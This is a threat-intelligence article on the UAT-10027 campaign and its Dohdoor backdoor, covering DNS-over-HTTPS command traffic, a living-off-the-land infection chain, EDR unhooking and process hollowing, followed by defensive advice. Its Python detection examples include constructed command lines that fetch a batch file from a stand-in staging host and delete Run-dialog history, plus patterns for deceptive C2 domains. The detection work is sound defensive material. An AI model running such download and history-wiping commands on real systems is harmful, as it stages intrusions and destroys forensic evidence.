The rapid evolution of cyber espionage has introduced a formidable new adversary that specifically preys upon the structural vulnerabilities of American healthcare and educational institutions. This recently identified threat actor, designated by security researchers as UAT-10027, has been orchestrating a sophisticated multi-stage intrusion campaign since the closing months of 2025. At the heart of this activity is a previously undocumented backdoor known as Dohdoor, a piece of malware that distinguishes itself through its masterful use of legitimate network protocols and system binaries. By targeting sectors that typically manage vast amounts of sensitive data while operating under significant budgetary and staffing constraints, the adversary maximizes its potential for successful penetration. These organizations often find themselves struggling to keep pace with the high-level technical ingenuity displayed by modern threat actors, making them ideal candidates for long-term espionage or secondary extortion schemes that leverage stolen medical and financial records.
Strategic Communication via Encrypted Channels
One of the most innovative aspects of this campaign involves the way the malware communicates with its command-and-control infrastructure through the use of DNS-over-HTTPS. By leveraging encrypted DNS services provided by major platforms like Cloudflare, Dohdoor effectively cloaks its malicious traffic within standard HTTPS requests that appear entirely benign to traditional network monitoring tools. This approach bypasses the conventional security filters that typically flag suspicious DNS queries to unverified domains, as the traffic is indistinguishable from routine web browsing or authorized application updates. The shift toward utilizing encrypted protocols for malicious intent represents a significant hurdle for network administrators who rely on visibility into DNS traffic to identify and block connections to known malicious servers. Because the communication is encrypted from the point of origin, internal security appliances cannot easily inspect the payload of these requests without implementing complex decryption proxies.
Furthermore, the threat actor employs a highly deceptive naming convention for its subdomains and top-level domains to blend into the daily noise of a modern corporate network environment. By using strings that mimic legitimate software maintenance activities, such as those related to system updates or security check-ins, the malware reduces the likelihood of manual discovery by security analysts. The adversary utilizes irregular capitalization and non-standard top-level domains like “.OnLiNe,” “.DeSigN,” and “.SoFTWARe” to specifically circumvent automated security filters that rely on rigid string matching or standard domain lists. This psychological layering of the attack ensures that even if a query is logged, it may be dismissed by a human operator as a harmless, if strangely named, background process. This level of detail in the infrastructure setup demonstrates a deep understanding of how security operations centers prioritize alerts and the specific limitations of the automated tools they employ to manage massive volumes of data.
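As an added example (not code from the original report or its authors), the following Python scores DoH resolver log lines for the naming tricks described above and for the high-frequency queries to non-standard top-level domains that the defensive section later recommends hunting for. The log lines, the maintenance-word watchlist and the repeat-count threshold are constructed for the example.

```python
import re
from collections import Counter

# Non-standard TLDs from the article; matched on the lowercased name so that
# irregular capitalization such as ".SoFTWARe" cannot slip past the check.
SUSPECT_TLDS = {"online", "design", "software"}
MAINT_WORDS = re.compile(r"update|patch|checkin")  # assumed maintenance-mimic watchlist
FREQ_THRESHOLD = 4  # assumed per-client repeat count that we treat as beaconing
# Constructed resolver log lines: "<timestamp> <client ip> <queried name>".
SAMPLE_LOG = """\
2025-12-03T09:00:01 10.0.4.21 www.example.com
2025-12-03T09:00:02 10.0.4.21 win-update-checkin.hostmaint.OnLiNe
2025-12-03T09:00:12 10.0.4.21 win-update-checkin.hostmaint.OnLiNe
2025-12-03T09:00:22 10.0.4.21 win-update-checkin.hostmaint.OnLiNe
2025-12-03T09:00:32 10.0.4.21 win-update-checkin.hostmaint.OnLiNe
2025-12-03T09:00:41 10.0.4.22 patch-status.svcrelay.DeSigN
2025-12-03T09:00:50 10.0.4.23 studio.portfolio.design
"""

def normalize(qname: str) -> str:
    """DNS names are case-insensitive: drop the trailing dot and lowercase."""
    return qname.rstrip(".").lower()

def registrable_domain(qname: str) -> str:
    """Last two labels; adequate for these generic TLDs without a public-suffix list."""
    return ".".join(normalize(qname).split(".")[-2:])

def classify(qname: str) -> list:
    """Reasons a single query resembles Dohdoor-style C2 naming, or [] if none."""
    name = normalize(qname)
    reasons = []
    if name.rsplit(".", 1)[-1] in SUSPECT_TLDS:
        reasons.append("non-standard tld")
        if qname.rstrip(".") != name:          # ".OnLiNe" style casing games
            reasons.append("irregular capitalization")
        if MAINT_WORDS.search(name):           # labels posing as update traffic
            reasons.append("mimics maintenance traffic")
    return reasons

def analyze(log_text: str) -> dict:
    """Flag suspicious queries and count repeats per (client, domain) to spot beaconing."""
    per_client_domain = Counter()
    flagged = []
    for line in log_text.splitlines():
        ts, client, qname = line.split()
        reasons = classify(qname)
        if reasons:
            flagged.append((ts, client, normalize(qname), reasons))
            per_client_domain[(client, registrable_domain(qname))] += 1
    beaconing = sorted(k for k, n in per_client_domain.items() if n >= FREQ_THRESHOLD)
    return {"flagged": flagged, "beaconing": beaconing}
```

A lowercase, legitimately registered `.design` site still gets a single weak reason, which is why the per-client repeat count, not the TLD alone, decides what is escalated.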
Living off the Land and Anti-Forensic Tactics
The infection chain utilized by UAT-10027 adheres to a strict living-off-the-land philosophy, which prioritizes the use of pre-installed Windows utilities over custom-built executable files. The initial breach typically originates from a carefully crafted phishing email that delivers a PowerShell script designed to execute immediately upon interaction. Rather than attempting to download a massive malware package all at once, this script invokes the legitimate Windows tool curl.exe to retrieve a secondary batch file from a remote staging server. This incremental approach allows the adversary to maintain a minimal footprint on the victim’s machine, as the individual commands and tools being used are common features of any standard administrative environment. By breaking the attack into several small, seemingly unrelated stages, the threat actor ensures that no single event is significant enough to trigger a high-severity alert within the security software, allowing the intrusion to progress quietly.
Building on this foundation of stealth, the secondary batch script performs aggressive anti-forensic measures to prevent investigators from reconstructing the timeline of the attack. It establishes hidden working directories in system folders like C:\ProgramData or C:\Users\Public, which are frequently overlooked during casual inspections. Once the script has successfully prepared the environment for the next phase of the infection, it systematically wipes the Run command history from the system registry, clears the contents of the clipboard, and deletes its own source code. This self-deletion capability is crucial for maintaining long-term persistence, as it leaves behind very little evidence for forensic experts to analyze. The final execution of the core malware is achieved through DLL sideloading, where trusted Windows binaries such as mblctr.exe or Fondue.exe are manipulated into loading the malicious Dohdoor DLL files. By piggybacking on these signed and trusted processes, the malware successfully evades signature-based antivirus solutions.
Advanced Evasion and Payload Execution
Once the malware has established its initial foothold, it employs advanced technical maneuvers designed to effectively blind endpoint detection and response tools. This is primarily achieved through a technique known as syscall unhooking, where the malware patches critical system call stubs within the ntdll.dll library. Security products typically place monitoring hooks in these locations to observe and intercept suspicious activity, such as unauthorized memory access or process manipulation. By removing these hooks, Dohdoor ensures that its subsequent actions are invisible to the security software, allowing it to operate with nearly absolute impunity within the compromised system. This proactive dismantling of the host’s defenses is a hallmark of sophisticated state-sponsored actors who prioritize remaining undetected for as long as possible. Once the defensive software is neutralized, the malware can proceed with its primary objectives without fear of being blocked or quarantined by the automated response system.
The ultimate goal of the Dohdoor loader is to facilitate the delivery of a final high-level payload, which recent investigations suggest is a Cobalt Strike Beacon based on specific JA3S hash signatures. After resolving its command-and-control server via the encrypted DNS-over-HTTPS channel, the malware parses JSON responses to receive instructions and download an encrypted payload package. This data is decrypted using a custom XOR-SUB algorithm that relies on a position-dependent cipher, a technique that makes static analysis extremely difficult for researchers who lack the specific decryption keys. Finally, the decrypted malicious code is injected into legitimate, long-running processes like OpenWith.exe or wab.exe via a method known as process hollowing. By replacing the memory of a legitimate application with its own code, the malware can execute its commands under the guise of a standard Windows process. This final layer of deception ensures that any remaining behavioral analysis tools see only the activities of a verified system component.
Defensive Strategies for Resilient Infrastructure
The analysis of UAT-10027’s methodology has revealed significant tactical overlaps with known sophisticated clusters, specifically in the way they handle domain naming and internal system unhooking. These findings indicate that the adversary is not merely an opportunistic criminal group but a highly organized entity with a clear strategic focus on maintaining access to sensitive American infrastructure. To counter such a persistent threat, organizations must move beyond traditional perimeter defenses and adopt a more granular approach to internal security monitoring. This includes the implementation of rigorous auditing for built-in Windows tools that are frequently misused in living-off-the-land attacks. By tracking the execution of utilities like curl.exe and mblctr.exe and flagging instances where they interact with unusual network resources or hidden system directories, administrators can identify the early warning signs of an intrusion before the malware has a chance to disable the primary defensive tools.
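An added example, not code from the report, showing how the execution tracking recommended here can be expressed over process-creation events: each stage of the curl.exe, batch file, registry wipe and DLL sideload chain described in the living-off-the-land section yields only a low-severity hit on its own, and correlating the stages is what produces the alert. The events, directory names, file names and staging URL are constructed; the rule that a sideload host running outside the system directory is suspicious is an assumed heuristic.

```python
import re

STAGING_DIRS = re.compile(r"c:\\(programdata|users\\public)\\", re.I)  # dirs named in the article
SYSTEM_DIRS = re.compile(r"c:\\windows\\(system32|syswow64)\\", re.I)
SIDELOAD_HOSTS = {"mblctr.exe", "fondue.exe"}        # signed hosts the article names
SCRIPT_HOSTS = {"powershell.exe", "cmd.exe"}        # parents that should rarely launch curl

# Constructed process-creation events shaped like Sysmon Event ID 1 fields;
# paths, file names and the staging URL are invented for the example.
EVENTS = [
    {"Image": r"C:\Windows\System32\curl.exe",
     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"curl.exe -s http://stage.example.invalid/s.bat -o C:\ProgramData\.cache\s.bat"},
    {"Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"cmd.exe /c C:\ProgramData\.cache\s.bat"},
    {"Image": r"C:\Windows\System32\reg.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"reg.exe delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f"},
    {"Image": r"C:\ProgramData\.cache\mblctr.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "mblctr.exe"},
    {"Image": r"C:\Windows\System32\curl.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "curl.exe -O https://downloads.example.com/tool.zip"},  # routine admin use
]

def score_event(ev: dict) -> list:
    """Return the LOTL stages a single event matches (empty list for benign events)."""
    image = ev["Image"].rsplit("\\", 1)[-1].lower()
    parent = ev["ParentImage"].rsplit("\\", 1)[-1].lower()
    cmd = ev["CommandLine"]
    hits = []
    # Stage 1: curl.exe driven by a script host and dropping a file into a staging dir.
    if image == "curl.exe" and parent in SCRIPT_HOSTS and STAGING_DIRS.search(cmd):
        hits.append("curl staging download")
    # Stage 2: the fetched batch file executed out of ProgramData / Users\Public.
    if image == "cmd.exe" and re.search(r"\.bat\b", cmd, re.I) and STAGING_DIRS.search(cmd):
        hits.append("batch run from staging dir")
    # Stage 3: anti-forensics, the Run dialog history key (RunMRU) being deleted.
    if image == "reg.exe" and "runmru" in cmd.lower():
        hits.append("RunMRU history wiped")
    # Stage 4: a sideload host running outside the system directory (assumed heuristic).
    if image in SIDELOAD_HOSTS and not SYSTEM_DIRS.search(ev["Image"]):
        hits.append("sideload host outside system dir")
    return hits

def assess_chain(events: list, min_stages: int = 3) -> dict:
    """Correlate per-event hits: individually low severity, together a likely intrusion."""
    stages = sorted({h for ev in events for h in score_event(ev)})
    return {"stages": stages, "alert": len(stages) >= min_stages}
```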
Moving forward, the primary focus for security teams should be the deployment of advanced endpoint detection solutions that are specifically designed to monitor the integrity of core system components like ntdll.dll. Since the malware’s effectiveness relies heavily on its ability to unhook system calls, any unauthorized modification to these components must be treated as a high-priority security event. Additionally, organizations should consider implementing specialized DNS inspection tools that are capable of decrypting and analyzing DNS-over-HTTPS traffic to detect the presence of anomalous subdomains or high-frequency queries to non-standard top-level domains. Strengthening the security posture of the healthcare and education sectors requires a combination of automated detection and proactive threat hunting to uncover the subtle traces left behind by multi-stage loaders. By focusing on these specific technical weaknesses, defenders can build a more resilient infrastructure that is better equipped to withstand the sophisticated tactics employed by actors like UAT-10027.
